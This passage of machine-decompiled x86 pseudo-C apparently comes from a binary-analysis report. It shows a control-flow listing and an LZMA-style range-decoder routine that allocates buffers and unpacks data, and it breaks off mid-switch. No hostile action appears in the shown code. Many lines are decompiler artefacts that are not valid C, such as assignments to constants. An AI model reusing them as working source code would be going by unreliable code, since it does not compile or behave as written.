                                                                                            control_flow_graph 520 40604c-406051 521 4060c2-4060e0 520->521 522 406053-406082 520->522 525 4066b8-4066cd 521->525 523 406084-406087 522->523 524 406089-40608d 522->524 526 406099-40609c 523->526 527 406095 524->527 528 40608f-406093 524->528 529 4066e7-4066fd 525->529 530 4066cf-4066e5 525->530 532 4060ba-4060bd 526->532 533 40609e-4060a7 526->533 527->526 528->526 531 406700-406707 529->531 530->531 537 406709-40670d 531->537 538 40672e-40673a 531->538 536 40628f-4062ad 532->536 534 4060a9 533->534 535 4060ac-4060b8 533->535 534->535 542 406122-406150 535->542 540 4062c5-4062d7 536->540 541 4062af-4062c3 536->541 543 406713-40672b 537->543 544 4068bc-4068c6 537->544 545 405ed0-405ed9 538->545 548 4062da-4062e4 540->548 541->548 546 406152-40616a 542->546 547 40616c-406186 542->547 543->538 549 4068d2-4068e5 544->549 554 4068e7 545->554 555 405edf 545->555 550 406189-406193 546->550 547->550 552 4062e6 548->552 553 406287-40628d 548->553 551 4068ea-4068ee 549->551 557 406199 550->557 558 40610a-406110 550->558 568 40626c-406284 552->568 569 40686e-406878 552->569 553->536 556 40622b-406235 553->556 554->551 560 405ee6-405eea 555->560 561 406026-406047 555->561 562 405f8b-405f8f 555->562 563 405ffb-405fff 555->563 564 40687a-406884 556->564 565 40623b-406404 556->565 582 406856-406860 557->582 583 4060ef-406107 557->583 566 4061c3-4061c9 558->566 567 406116-40611c 558->567 560->549 573 405ef0-405efd 560->573 561->525 571 405f95-405fae 562->571 572 40683b-406845 562->572 574 406005-406019 563->574 575 40684a-406854 563->575 564->549 565->545 578 406227 566->578 580 4061cb-4061e9 566->580 567->542 567->578 568->553 569->549 579 405fb1-405fb5 571->579 572->549 573->554 581 405f03-405f49 573->581 576 40601c-406024 574->576 575->549 576->561 576->563 578->556 579->562 584 405fb7-405fbd 579->584 585 406201-406213 580->585 586 4061eb-4061ff 580->586 587 405f71-405f73 581->587 588 405f4b-405f4f 581->588 582->549 583->558 593 405fe7-405ff9 584->593 594 405fbf-405fc6 584->594 595 406216-406220 585->595 586->595 591 405f81-405f89 587->591 592 405f75-405f7f 587->592 589 405f51-405f54 GlobalFree 588->589 590 405f5a-405f68 GlobalAlloc 588->590 589->590 590->554 596 405f6e 590->596 591->579 592->591 592->592 593->576 597 405fd1-405fe1 GlobalAlloc 594->597 598 405fc8-405fcb GlobalFree 594->598 595->566 599 406222 595->599 596->587 597->554 597->593 598->597 601 406862-40686c 599->601 602 4061a8-4061c0 599->602 601->549 602->566
                                                                                            C-Code - Quality: 98%
                                                                                            			E0040604C() {
                                                                                            				unsigned short _t531;
                                                                                            				signed int _t532;
                                                                                            				void _t533;
                                                                                            				void* _t534;
                                                                                            				signed int _t535;
                                                                                            				signed int _t565;
                                                                                            				signed int _t568;
                                                                                            				signed int _t590;
                                                                                            				signed int* _t607;
                                                                                            				void* _t614;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					if( *(_t614 - 0x40) != 0) {
                                                                                            						 *(_t614 - 0x34) = 1;
                                                                                            						 *(_t614 - 0x84) = 7;
                                                                                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                            						L132:
                                                                                            						 *(_t614 - 0x54) = _t607;
                                                                                            						L133:
                                                                                            						_t531 =  *_t607;
                                                                                            						_t590 = _t531 & 0x0000ffff;
                                                                                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                            						if( *(_t614 - 0xc) >= _t565) {
                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                            							 *(_t614 - 0x40) = 1;
                                                                                            							_t532 = _t531 - (_t531 >> 5);
                                                                                            							 *_t607 = _t532;
                                                                                            						} else {
                                                                                            							 *(_t614 - 0x10) = _t565;
                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                            						}
                                                                                            						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                            							L139:
                                                                                            							_t533 =  *(_t614 - 0x84);
                                                                                            							L140:
                                                                                            							 *(_t614 - 0x88) = _t533;
                                                                                            							goto L1;
                                                                                            						} else {
                                                                                            							L137:
                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                            								 *(_t614 - 0x88) = 5;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                            							goto L139;
                                                                                            						}
                                                                                            					} else {
                                                                                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            						__esi =  *(__ebp - 0x60);
                                                                                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            						__ecx =  *(__ebp - 0x3c);
                                                                                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            						__ecx =  *(__ebp - 4);
                                                                                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            						if( *(__ebp - 0x38) >= 4) {
                                                                                            							if( *(__ebp - 0x38) >= 0xa) {
                                                                                            								_t97 = __ebp - 0x38;
                                                                                            								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            							}
                                                                                            						} else {
                                                                                            							 *(__ebp - 0x38) = 0;
                                                                                            						}
                                                                                            						if( *(__ebp - 0x34) == __edx) {
                                                                                            							__ebx = 0;
                                                                                            							__ebx = 1;
                                                                                            							L60:
                                                                                            							__eax =  *(__ebp - 0x58);
                                                                                            							__edx = __ebx + __ebx;
                                                                                            							__ecx =  *(__ebp - 0x10);
                                                                                            							__esi = __edx + __eax;
                                                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__edi = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								_t216 = __edx + 1; // 0x1
                                                                                            								__ebx = _t216;
                                                                                            								__cx = __ax >> 5;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edi;
                                                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								L59:
                                                                                            								if(__ebx >= 0x100) {
                                                                                            									goto L54;
                                                                                            								}
                                                                                            								goto L60;
                                                                                            							} else {
                                                                                            								L57:
                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                            									 *(__ebp - 0x88) = 0xf;
                                                                                            									goto L170;
                                                                                            								}
                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								_t202 = __ebp - 0x70;
                                                                                            								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								goto L59;
                                                                                            							}
                                                                                            						} else {
                                                                                            							__eax =  *(__ebp - 0x14);
                                                                                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            							if(__eax >=  *(__ebp - 0x74)) {
                                                                                            								__eax = __eax +  *(__ebp - 0x74);
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 8);
                                                                                            							__ebx = 0;
                                                                                            							__ebx = 1;
                                                                                            							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                            							L40:
                                                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                            							__ecx =  *(__ebp - 0x58);
                                                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                            							 *(__ebp - 0x48) = __eax;
                                                                                            							__eax = __eax + 1;
                                                                                            							__eax = __eax << 8;
                                                                                            							__eax = __eax + __ebx;
                                                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                            							__ax =  *__esi;
                                                                                            							 *(__ebp - 0x54) = __esi;
                                                                                            							__edx = __ax & 0x0000ffff;
                                                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            								__cx = __ax;
                                                                                            								 *(__ebp - 0x40) = 1;
                                                                                            								__cx = __ax >> 5;
                                                                                            								__ebx = __ebx + __ebx + 1;
                                                                                            								 *__esi = __ax;
                                                                                            							} else {
                                                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                            								 *(__ebp - 0x10) = __ecx;
                                                                                            								0x800 = 0x800 - __edx;
                                                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                            								__ebx = __ebx + __ebx;
                                                                                            								 *__esi = __cx;
                                                                                            							}
                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                            								L38:
                                                                                            								__eax =  *(__ebp - 0x40);
                                                                                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                            									while(1) {
                                                                                            										if(__ebx >= 0x100) {
                                                                                            											break;
                                                                                            										}
                                                                                            										__eax =  *(__ebp - 0x58);
                                                                                            										__edx = __ebx + __ebx;
                                                                                            										__ecx =  *(__ebp - 0x10);
                                                                                            										__esi = __edx + __eax;
                                                                                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                            										__ax =  *__esi;
                                                                                            										 *(__ebp - 0x54) = __esi;
                                                                                            										__edi = __ax & 0x0000ffff;
                                                                                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                            										if( *(__ebp - 0xc) >= __ecx) {
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                            											__cx = __ax;
                                                                                            											_t169 = __edx + 1; // 0x1
                                                                                            											__ebx = _t169;
                                                                                            											__cx = __ax >> 5;
                                                                                            											 *__esi = __ax;
                                                                                            										} else {
                                                                                            											 *(__ebp - 0x10) = __ecx;
                                                                                            											0x800 = 0x800 - __edi;
                                                                                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                            											__ebx = __ebx + __ebx;
                                                                                            											 *__esi = __cx;
                                                                                            										}
                                                                                            										 *(__ebp - 0x44) = __ebx;
                                                                                            										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                            											L45:
                                                                                            											if( *(__ebp - 0x6c) == 0) {
                                                                                            												 *(__ebp - 0x88) = 0xe;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											__ecx =  *(__ebp - 0x70);
                                                                                            											__eax =  *(__ebp - 0xc);
                                                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            											_t155 = __ebp - 0x70;
                                                                                            											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            										}
                                                                                            									}
                                                                                            									L53:
                                                                                            									_t172 = __ebp - 0x34;
                                                                                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                            									L54:
                                                                                            									__al =  *(__ebp - 0x44);
                                                                                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                            									L55:
                                                                                            									if( *(__ebp - 0x64) == 0) {
                                                                                            										 *(__ebp - 0x88) = 0x1a;
                                                                                            										goto L170;
                                                                                            									}
                                                                                            									__ecx =  *(__ebp - 0x68);
                                                                                            									__al =  *(__ebp - 0x5c);
                                                                                            									__edx =  *(__ebp - 8);
                                                                                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                            									 *( *(__ebp - 0x68)) = __al;
                                                                                            									__ecx =  *(__ebp - 0x14);
                                                                                            									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                            									__eax = __ecx + 1;
                                                                                            									__edx = 0;
                                                                                            									_t191 = __eax %  *(__ebp - 0x74);
                                                                                            									__eax = __eax /  *(__ebp - 0x74);
                                                                                            									__edx = _t191;
                                                                                            									L79:
                                                                                            									 *(__ebp - 0x14) = __edx;
                                                                                            									L80:
                                                                                            									 *(__ebp - 0x88) = 2;
                                                                                            									goto L1;
                                                                                            								}
                                                                                            								if(__ebx >= 0x100) {
                                                                                            									goto L53;
                                                                                            								}
                                                                                            								goto L40;
                                                                                            							} else {
                                                                                            								L36:
                                                                                            								if( *(__ebp - 0x6c) == 0) {
                                                                                            									 *(__ebp - 0x88) = 0xd;
                                                                                            									L170:
                                                                                            									_t568 = 0x22;
                                                                                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                            									_t535 = 0;
                                                                                            									L172:
                                                                                            									return _t535;
                                                                                            								}
                                                                                            								__ecx =  *(__ebp - 0x70);
                                                                                            								__eax =  *(__ebp - 0xc);
                                                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								_t121 = __ebp - 0x70;
                                                                                            								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            								goto L38;
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            					L1:
                                                                                            					_t534 =  *(_t614 - 0x88);
                                                                                            					if(_t534 > 0x1c) {
                                                                                            						L171:
                                                                                            						_t535 = _t534 | 0xffffffff;
                                                                                            						goto L172;
                                                                                            					}
                                                                                            					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                                                                                            						case 0:
                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                            							_t534 =  *( *(_t614 - 0x70));
                                                                                            							if(_t534 > 0xe1) {
                                                                                            								goto L171;
                                                                                            							}
                                                                                            							_t538 = _t534 & 0x000000ff;
                                                                                            							_push(0x2d);
                                                                                            							asm("cdq");
                                                                                            							_pop(_t570);
                                                                                            							_push(9);
                                                                                            							_pop(_t571);
                                                                                            							_t610 = _t538 / _t570;
                                                                                            							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                            							asm("cdq");
                                                                                            							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                            							 *(_t614 - 0x3c) = _t605;
                                                                                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                            								L10:
                                                                                            								if(_t613 == 0) {
                                                                                            									L12:
                                                                                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                            									goto L15;
                                                                                            								} else {
                                                                                            									goto L11;
                                                                                            								}
                                                                                            								do {
                                                                                            									L11:
                                                                                            									_t613 = _t613 - 1;
                                                                                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                            								} while (_t613 != 0);
                                                                                            								goto L12;
                                                                                            							}
                                                                                            							if( *(_t614 - 4) != 0) {
                                                                                            								GlobalFree( *(_t614 - 4));
                                                                                            							}
                                                                                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            							 *(_t614 - 4) = _t534;
                                                                                            							if(_t534 == 0) {
                                                                                            								goto L171;
                                                                                            							} else {
                                                                                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                            								goto L10;
                                                                                            							}
                                                                                            						case 1:
                                                                                            							L13:
                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                            								 *(_t614 - 0x88) = 1;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                            							_t45 = _t614 - 0x48;
                                                                                            							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                            							__eflags =  *_t45;
                                                                                            							L15:
                                                                                            							if( *(_t614 - 0x48) < 4) {
                                                                                            								goto L13;
                                                                                            							}
                                                                                            							_t546 =  *(_t614 - 0x40);
                                                                                            							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                            								L20:
                                                                                            								 *(_t614 - 0x48) = 5;
                                                                                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                            								goto L23;
                                                                                            							}
                                                                                            							 *(_t614 - 0x74) = _t546;
                                                                                            							if( *(_t614 - 8) != 0) {
                                                                                            								GlobalFree( *(_t614 - 8));
                                                                                            							}
                                                                                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                            							 *(_t614 - 8) = _t534;
                                                                                            							if(_t534 == 0) {
                                                                                            								goto L171;
                                                                                            							} else {
                                                                                            								goto L20;
                                                                                            							}
                                                                                            						case 2:
                                                                                            							L24:
                                                                                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                            							 *(_t614 - 0x84) = 6;
                                                                                            							 *(_t614 - 0x4c) = _t553;
                                                                                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                            							goto L132;
                                                                                            						case 3:
                                                                                            							L21:
                                                                                            							__eflags =  *(_t614 - 0x6c);
                                                                                            							if( *(_t614 - 0x6c) == 0) {
                                                                                            								 *(_t614 - 0x88) = 3;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                            							_t67 = _t614 - 0x70;
                                                                                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                            							__eflags =  *_t67;
                                                                                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                            							L23:
                                                                                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                            							if( *(_t614 - 0x48) != 0) {
                                                                                            								goto L21;
                                                                                            							}
                                                                                            							goto L24;
                                                                                            						case 4:
                                                                                            							goto L133;
                                                                                            						case 5:
                                                                                            							goto L137;
                                                                                            						case 6:
                                                                                            							goto L0;
                                                                                            						case 7:
                                                                                            							__eflags =  *(__ebp - 0x40) - 1;
                                                                                            							if( *(__ebp - 0x40) != 1) {
                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                            								 *(__ebp - 0x80) = 0x16;
                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            								__eax =  *(__ebp - 0x28);
                                                                                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            								__eax =  *(__ebp - 0x2c);
                                                                                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            								__eax = 0;
                                                                                            								__eflags =  *(__ebp - 0x38) - 7;
                                                                                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                            								__al = __al & 0x000000fd;
                                                                                            								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__eax =  *(__ebp - 4) + 0x664;
                                                                                            								__eflags = __eax;
                                                                                            								 *(__ebp - 0x58) = __eax;
                                                                                            								goto L68;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 4);
                                                                                            							__ecx =  *(__ebp - 0x38);
                                                                                            							 *(__ebp - 0x84) = 8;
                                                                                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                            							goto L132;
                                                                                            						case 8:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                            								 *(__ebp - 0x84) = 0xa;
                                                                                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                            							} else {
                                                                                            								__eax =  *(__ebp - 0x38);
                                                                                            								__ecx =  *(__ebp - 4);
                                                                                            								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                            								 *(__ebp - 0x84) = 9;
                                                                                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                            							}
                                                                                            							goto L132;
                                                                                            						case 9:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								goto L89;
                                                                                            							}
                                                                                            							__eflags =  *(__ebp - 0x60);
                                                                                            							if( *(__ebp - 0x60) == 0) {
                                                                                            								goto L171;
                                                                                            							}
                                                                                            							__eax = 0;
                                                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                                                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                            							__eflags = _t258;
                                                                                            							0 | _t258 = _t258 + _t258 + 9;
                                                                                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                            							goto L75;
                                                                                            						case 0xa:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__eax =  *(__ebp - 4);
                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                            								goto L132;
                                                                                            							}
                                                                                            							__eax =  *(__ebp - 0x28);
                                                                                            							goto L88;
                                                                                            						case 0xb:
                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                            							} else {
                                                                                            								__eax =  *(__ebp - 0x24);
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x28);
                                                                                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                            							L88:
                                                                                            							__ecx =  *(__ebp - 0x2c);
                                                                                            							 *(__ebp - 0x2c) = __eax;
                                                                                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                            							L89:
                                                                                            							__eax =  *(__ebp - 4);
                                                                                            							 *(__ebp - 0x80) = 0x15;
                                                                                            							__eax =  *(__ebp - 4) + 0xa68;
                                                                                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                            							goto L68;
                                                                                            						case 0xc:
                                                                                            							L99:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0xc;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t334 = __ebp - 0x70;
                                                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t334;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							__eax =  *(__ebp - 0x2c);
                                                                                            							goto L101;
                                                                                            						case 0xd:
                                                                                            							goto L36;
                                                                                            						case 0xe:
                                                                                            							goto L45;
                                                                                            						case 0xf:
                                                                                            							goto L57;
                                                                                            						case 0x10:
                                                                                            							L109:
                                                                                            							__eflags =  *(__ebp - 0x6c);
                                                                                            							if( *(__ebp - 0x6c) == 0) {
                                                                                            								 *(__ebp - 0x88) = 0x10;
                                                                                            								goto L170;
                                                                                            							}
                                                                                            							__ecx =  *(__ebp - 0x70);
                                                                                            							__eax =  *(__ebp - 0xc);
                                                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							_t365 = __ebp - 0x70;
                                                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                            							__eflags =  *_t365;
                                                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                            							goto L111;
                                                                                            						case 0x11:
                                                                                            							L68:
